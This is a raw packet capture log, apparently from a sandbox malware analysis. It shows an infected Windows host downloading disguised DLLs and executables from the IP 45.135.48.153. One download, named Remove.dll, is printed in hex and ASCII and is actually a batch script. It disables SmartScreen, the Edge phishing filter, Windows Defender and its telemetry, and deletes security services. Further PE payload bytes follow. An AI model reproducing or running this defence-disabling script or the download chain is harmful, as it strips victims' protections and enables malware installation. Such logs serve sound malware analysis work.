Apr 19, 2022 16:44:26.602926970 CEST	1162	IN	Data Raw: 13 00 00 01 00 00 00 00 71 05 00 00 33 00 00 00 a4 05 00 00 03 00 00 00 13 00 00 01 00 00 00 00 16 00 00 00 c2 06 00 00 d8 06 00 00 37 00 00 00 15 00 00 01 1b 30 05 00 cb 01 00 00 02 00 00 11 16 0a 16 0b 28 36 00 00 0a 0a 28 37 00 00 0a 0b de 03 Data Ascii: q370(6(7&~+o&Yo'rPpo8,rdprfpo%~(9o:o;+&,o<,(-XXi2~(9o:o;
Apr 19, 2022 16:44:26.602967024 CEST	1163	IN	Data Raw: 6f 2f 00 00 0a 72 88 0d 00 70 28 01 00 00 2b 2c 34 08 11 08 72 96 0d 00 70 28 31 00 00 0a 09 28 08 00 00 06 26 08 11 08 72 96 0d 00 70 28 31 00 00 0a 09 28 07 00 00 06 26 11 0a 72 88 0d 00 70 6f 52 00 00 0a de 0c 6f 35 00 00 0a 28 21 00 00 0a de Data Ascii: o/rp(+,4rp(1(&rp(1(&rpoRo5(!oG(&XXi?,oG&(rp(!(**Ad;9
Apr 19, 2022 16:44:26.603100061 CEST	1165	IN	Data Raw: 00 00 00 00 70 70 00 03 13 00 00 01 13 30 03 00 c2 00 00 00 0a 00 00 11 73 6b 00 00 0a 0a 72 66 04 00 70 0b 1f 20 0d 02 13 04 16 13 05 38 8e 00 00 00 11 04 11 05 9a 13 06 11 06 6f 6c 00 00 0a 0c 08 16 6f 6d 00 00 0a 1f 2f 33 47 03 08 17 6f 6d 00 Data Ascii: pp0skrfp 8olom/3Gom(+,# .olonomrfp+<oo?rfpon* 3oo?rfponrp((Xi?golon(p*0Vr
Apr 19, 2022 16:44:26.603224039 CEST	1166	IN	Data Raw: 2e 30 2e 33 30 33 31 39 00 00 00 00 05 00 6c 00 00 00 70 13 00 00 23 7e 00 00 dc 13 00 00 6c 18 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 48 2c 00 00 8c 12 00 00 23 55 53 00 d4 3e 00 00 10 00 00 00 23 47 55 49 44 00 00 00 e4 3e 00 00 d4 10 00 00 Data Ascii: .0.30319lp#~l#StringsH,#US>#GUID>#BlobW?3R7Fw
Apr 19, 2022 16:44:26.603387117 CEST	1167	IN	Data Raw: 56 80 5c 01 1b 0e 56 80 1e 01 1b 0e 56 80 66 05 1b 0e 56 80 9a 05 1b 0e 56 80 02 06 1b 0e 56 80 ee 05 1b 0e 56 80 17 08 1b 0e 56 80 11 02 1b 0e 56 80 f6 00 1b 0e 56 80 3b 05 1b 0e 56 80 7c 05 1b 0e 56 80 e2 05 1b 0e 06 06 37 08 18 0e 56 80 f6 07 Data Ascii: V\VVfVVVVVVV;V\|V7VVV"VVpVVJVVKV^VVZV7V4#V#V#V#V#V\#V#Vf#V#V#V#V#V#V
Apr 19, 2022 16:44:26.603427887 CEST	1169	IN	Data Raw: b1 10 00 00 01 00 68 0e 00 00 01 00 68 0e 00 00 02 00 23 06 00 00 01 00 66 17 00 00 02 00 7d 17 00 00 03 00 5e 11 00 00 04 00 48 08 00 00 01 00 66 17 00 00 02 00 7d 17 00 00 03 00 5e 11 00 00 01 00 66 17 00 00 02 00 7d 17 00 00 03 00 5e 11 00 00 Data Ascii: hh#f}^Hf}^f}^ hbb_r.P llP;
Apr 19, 2022 16:44:26.603540897 CEST	1170	IN	Data Raw: 0e 00 8c 00 1b 0a 0e 00 90 00 50 0a 0e 00 94 00 73 0a 0e 00 98 00 98 0a 0e 00 9c 00 bf 0a 0e 00 a0 00 e0 0a 0e 00 a4 00 01 0b 0e 00 a8 00 3a 0b 0e 00 ac 00 69 0b 0e 00 b0 00 9c 0b 0e 00 b4 00 bf 0b 0e 00 b8 00 e8 0b 0e 00 bc 00 1f 0c 09 00 cc 00 Data Ascii: Ps:iNSX]bgSSSlqv{ $(,048<
Apr 19, 2022 16:44:26.603611946 CEST	1171	IN	Data Raw: 53 54 41 4e 44 41 52 44 5f 52 49 47 48 54 53 5f 52 45 41 44 00 45 52 52 4f 52 5f 4e 4f 54 5f 41 4c 4c 5f 41 53 53 49 47 4e 45 44 00 45 52 52 4f 52 5f 4e 4f 4e 45 5f 4d 41 50 50 45 44 00 53 54 41 4e 44 41 52 44 5f 52 49 47 48 54 53 5f 52 45 51 55 Data Ascii: STANDARD_RIGHTS_READERROR_NOT_ALL_ASSIGNEDERROR_NONE_MAPPEDSTANDARD_RIGHTS_REQUIREDSE_DACL_PROTECTEDSE_SACL_PROTECTEDSE_DACL_AUTO_INHERITEDSE_SACL_AUTO_INHERITEDSE_DACL_DEFAULTEDSE_SACL_DEFAULTEDSE_GROUP_DEFAULTEDSE_OWNER_DEFAULTED
Apr 19, 2022 16:44:26.898639917 CEST	1173	IN	Data Raw: 50 52 4f 43 45 53 53 5f 56 4d 5f 4f 50 45 52 41 54 49 4f 4e 00 50 52 4f 47 52 41 4d 5f 48 45 4c 50 5f 49 4e 46 4f 00 53 79 73 74 65 6d 2e 49 4f 00 53 45 5f 44 41 43 4c 5f 41 55 54 4f 5f 49 4e 48 45 52 49 54 5f 52 45 51 00 53 45 5f 53 41 43 4c 5f Data Ascii: PROCESS_VM_OPERATIONPROGRAM_HELP_INFOSystem.IOSE_DACL_AUTO_INHERIT_REQSE_SACL_AUTO_INHERIT_REQERROR_INSUFFICIENT_BUFFERWRITE_OWNERThrowExceptionForHRHIVE_MOUNT_DIRTOKEN_PRIVILEGESTOKEN_ADJUST_PRIVILEGESGetNativeLUID_AND_ATTRIBUTEST
Apr 19, 2022 16:44:27.387414932 CEST	1205	OUT	GET /Vv/1/Remove.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:27.683156013 CEST	1207	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Thu, 25 Nov 2021 03:34:34 GMT Accept-Ranges: bytes ETag: "01345dade1d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:27 GMT Content-Length: 1675 Data Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 45 78 70 6c 6f 72 65 72 22 20 2f 76 20 53 6d 61 72 74 53 63 72 65 65 6e 45 6e 61 62 6c 65 64 20 2f 74 20 52 45 47 5f 53 5a 20 2f 64 20 22 4f 66 66 22 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 41 70 70 48 6f 73 74 22 20 2f 76 20 22 45 6e 61 62 6c 65 57 65 62 43 6f 6e 74 65 6e 74 45 76 61 6c 75 61 74 69 6f 6e 22 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 22 30 22 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 53 6f 66 74 77 61 72 65 5c 43 6c 61 73 73 65 73 5c 4c 6f 63 61 6c 20 53 65 74 74 69 6e 67 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 41 70 70 43 6f 6e 74 61 69 6e 65 72 5c 53 74 6f 72 61 67 65 5c 6d 69 63 72 6f 73 6f 66 74 2e 6d 69 63 72 6f 73 6f 66 74 65 64 67 65 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 5c 4d 69 63 72 6f 73 6f 66 74 45 64 67 65 5c 50 68 69 73 68 69 6e 67 46 69 6c 74 65 72 22 20 2f 76 20 22 45 6e 61 62 6c 65 64 56 39 22 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 22 30 22 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 50 6f 6c 69 63 69 65 73 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 22 20 2f 76 20 44 69 73 61 62 6c 65 41 6e 74 69 53 70 79 77 61 72 65 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 31 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 50 6f 6c 69 63 69 65 73 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 53 70 79 6e 65 74 22 20 2f 76 20 53 70 79 4e 65 74 52 65 70 6f 72 74 69 6e 67 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 30 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 50 6f 6c 69 63 69 65 73 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 53 70 79 6e 65 74 22 20 2f 76 20 53 75 62 6d 69 74 53 61 6d 70 6c 65 73 43 6f 6e 73 65 6e 74 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 32 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 50 6f 6c 69 63 69 65 73 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 53 70 79 6e 65 74 22 20 2f 76 20 44 6f 6e 74 52 65 70 6f 72 74 49 6e 66 65 63 74 69 6f 6e 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 31 20 2f 66 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 4c 4d 5c 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c 53 65 6e 73 65 22 20 2f 66 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 4c 4d 5c 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c 53 65 63 75 72 69 74 79 48 65 61 6c 74 68 53 65 72 76 69 63 65 22 20 2f 66 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 50 6f 6c 69 63 69 65 73 5c 4d 69 63 72 6f 73 6f 66 74 5c 4d 52 54 22 20 2f 76 20 Data Ascii: @echo offreg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /freg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /freg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DontReportInfectionInformation /t REG_DWORD /d 1 /freg delete "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /freg delete "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /freg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v
Apr 19, 2022 16:44:36.911778927 CEST	1208	OUT	GET /Vv/1/RuntimeBroker_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:37.207844973 CEST	1209	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Wed, 13 Apr 2022 12:14:14 GMT Accept-Ranges: bytes ETag: "0af59fd2f4fd81:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:36 GMT Content-Length: 23040 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 59 c8 72 a7 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 52 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 70 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 51 00 00 00 20 00 00 00 52 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 3e 00 00 88 32 00 00 01 00 00 00 2b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 03 00 60 00 00 00 00 00 00 00 02 72 01 00 00 70 7d 02 00 00 04 02 73 12 00 00 0a 7d 03 00 00 04 02 72 01 00 00 70 7d 04 00 00 04 02 72 01 00 00 70 7d 05 00 00 04 02 72 03 00 00 70 7d 06 00 00 04 02 28 13 00 00 0a 02 fe 06 03 00 00 06 73 14 00 00 0a 73 15 00 00 0a 25 17 6f 16 00 00 0a 6f 17 00 00 0a de 03 26 de 00 2a 01 10 00 00 00 00 3d 00 1f 5c 00 03 13 00 00 01 1b 30 05 00 cd 02 00 00 01 00 00 11 00 02 28 0b 00 00 06 0a 06 72 01 00 00 70 28 18 00 00 0a 2c 09 02 06 7d 05 00 00 04 de 27 de 19 0b 02 72 1f 00 00 70 07 6f 19 00 00 0a 28 1a 00 00 0a 28 0a 00 00 06 de 00 20 d0 07 00 00 28 1b 00 00 0a 2b bb 02 72 2f 00 00 70 02 7b 05 00 00 04 72 43 00 00 70 28 1c 00 00 0a 7d 04 00 00 04 02 28 04 00 00 06 02 73 1a 00 00 06 7d 01 00 00 04 02 28 08 00 00 06 02 fe 06 07 00 00 06 73 14 00 00 0a 73 15 00 00 0a 25 17 6f 16 00 00 0a 6f 17 00 00 0a 73 1d 00 00 0a 0c 08 72 9d 00 00 70 02 7b 06 00 00 04 72 ad 00 00 70 28 1c 00 00 0a 6f 1e 00 00 0a 17 8d 34 00 00 01 25 16 72 d1 00 00 70 28 1f 00 00 0a 9d 6f 20 00 00 0a 0d 16 13 04 2b 4a 09 11 04 9a 13 05 11 05 17 8d 34 00 00 01 25 16 72 d5 00 00 70 28 1f 00 00 0a 9d 6f 20 00 00 0a 13 06 02 7b 03 00 00 04 11 06 16 9a 6f 21 00 00 0a 11 06 17 9a 6f 21 00 00 0a 6f 22 00 00 0a de 03 26 de 00 11 04 17 58 13 04 11 04 09 8e 69 32 af de 0a 08 2c 06 08 6f 23 00 00 0a dc de 2d 26 02 7b 03 00 00 04 72 d9 00 00 70 72 e9 00 00 70 6f 22 00 00 0a 02 7b 03 00 00 04 72 29 01 00 70 72 3b 01 00 70 6f 22 00 00 0a de 00 00 18 13 07 28 24 00 00 0a 1e 33 05 19 13 07 2b 03 18 13 07 14 13 08 73 1d 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdYr"0R @ @@@ p8 H.text@Q R `.rsrcT@@H>2+0`rp}s}rp}rp}rp}(ss%oo&*=\0(rp(,}'rpo(( (+r/p{rCp(}(s}(ss%oosrp{rp(o4%rp(o +J4%rp(o {o!o!o"&Xi2,o#-&{rprpo"{r)pr;po"($3+s
Apr 19, 2022 16:44:37.995145082 CEST	1258	OUT	GET /Vv/1/RuntimeBrokerBin_64.dll HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:38.291044950 CEST	1277	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Wed, 13 Apr 2022 12:14:10 GMT Accept-Ranges: bytes ETag: "055f7fa2f4fd81:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:38 GMT Content-Length: 26624 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 36 d8 37 ea 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 60 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7d 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 5e 00 00 00 20 00 00 00 60 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 05 00 00 00 80 00 00 00 06 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 3e 00 00 f4 3d 00 00 01 00 00 00 3d 00 00 06 c4 7c 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 ed 01 00 00 01 00 00 11 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 07 00 00 04 02 28 14 00 00 0a 00 00 00 02 28 09 00 00 06 00 00 03 13 04 16 13 05 2b 17 11 04 11 05 9a 13 06 00 02 11 06 7d 03 00 00 04 00 11 05 17 58 13 05 11 05 11 04 8e 69 32 e1 02 fe 06 06 00 00 06 73 15 00 00 0a 73 16 00 00 0a 0a 06 17 6f 17 00 00 0a 00 06 6f 18 00 00 0a 00 28 19 00 00 0a 6f 1a 00 00 0a 0b 72 03 00 00 70 28 1b 00 00 0a 0c 00 08 13 07 16 13 08 2b 27 11 07 11 08 9a 13 09 00 11 09 6f 1c 00 00 0a 00 11 09 6f 1d 00 00 0a 00 11 09 6f 1e 00 00 0a 00 00 11 08 17 58 13 08 11 08 11 07 8e 69 32 d1 72 0f 00 00 70 28 1f 00 00 0a 0d 00 09 13 0a 16 13 0b 38 08 01 00 00 11 0a 11 0b 9a 13 0c 00 00 11 0c 72 21 00 00 70 28 20 00 00 0a 13 0d 11 0c 72 37 00 00 70 28 20 00 00 0a 13 0e 11 0d 28 21 00 00 0a 13 0f 11 0f 2c 27 00 11 0d 72 7f 00 00 70 28 20 00 00 0a 13 10 11 10 28 22 00 00 0a 13 11 11 11 2c 0a 00 11 10 28 23 00 00 0a 00 00 00 11 0e 28 21 00 00 0a 13 12 11 12 39 90 00 00 00 00 11 0e 72 95 00 00 70 28 20 00 00 0a 13 13 11 13 28 22 00 00 0a 13 14 11 14 2c 0a 00 11 13 28 23 00 00 0a 00 00 11 0e 72 a3 00 00 70 28 20 00 00 0a 13 13 11 13 28 22 00 00 0a 13 15 11 15 2c 08 11 13 28 23 00 00 0a 00 11 0e 72 c7 00 00 70 28 20 00 00 0a 13 13 11 13 28 22 00 00 0a 13 16 11 16 2c 08 11 13 28 23 00 00 0a 00 11 0e 72 e9 00 00 70 28 20 00 00 0a 13 13 11 13 28 22 00 00 0a 13 17 11 17 2c 08 11 13 28 23 00 00 0a 00 00 00 de 05 26 00 00 de 00 00 11 0b 17 58 13 0b 11 0b 11 0a 8e 69 3f ed fe ff ff 00 de 06 13 18 00 00 de 00 2a 00 00 00 41 34 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd67"0` @ @@@ \|}8 H.text&^ ` `.rsrcb@@H>==\|0rp}}((+}Xi2ssoo(orp(+'oooXi2rp(8r!p( r7p( (!,'rp( (",(#(!9rp( (",(#rp( (",(#rp( (",(#rp( (",(#&Xi?*A4
Apr 19, 2022 16:44:38.649934053 CEST	1304	OUT	GET /Vv/1/WinPcap_4_1_3.exe HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:38.946655035 CEST	1305	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 09 Nov 2021 09:06:22 GMT Accept-Ranges: bytes ETag: "0bbaf1049d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:38 GMT Content-Length: 915128 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cc e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5e 00 00 00 84 02 00 00 04 00 00 fa 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 04 00 00 04 00 00 e7 dc 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 f0 03 00 a8 43 00 00 00 00 00 00 00 00 00 00 c0 d7 0d 00 f8 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 4c 5c 00 00 00 10 00 00 00 5e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 a8 43 00 00 00 f0 03 00 00 44 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d 68 eb 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 70 eb 42 00 8d 45 a4 57 50 ff 75 08 ff Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK^0p@@tCp.textL\^ `.rdatapb@@.dataX\v@.ndata.rsrcCDz@@U\}t+}FEuHhBHPuuuHr@BSV5pBEWPu
Apr 19, 2022 16:44:41.532337904 CEST	2277	OUT	GET /Vv/1/vcredist_2010_x64.exe HTTP/1.1 Host: 45.135.48.153
Apr 19, 2022 16:44:41.829302073 CEST	2278	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 09 Nov 2021 09:06:22 GMT Accept-Ranges: bytes ETag: "0bbaf1049d5d71:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:41 GMT Content-Length: 5673816 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 23 70 41 a4 42 1e 12 a4 42 1e 12 a4 42 1e 12 67 4d 11 12 a5 42 1e 12 a4 42 1f 12 d9 42 1e 12 67 4d 43 12 ab 42 1e 12 67 4d 41 12 84 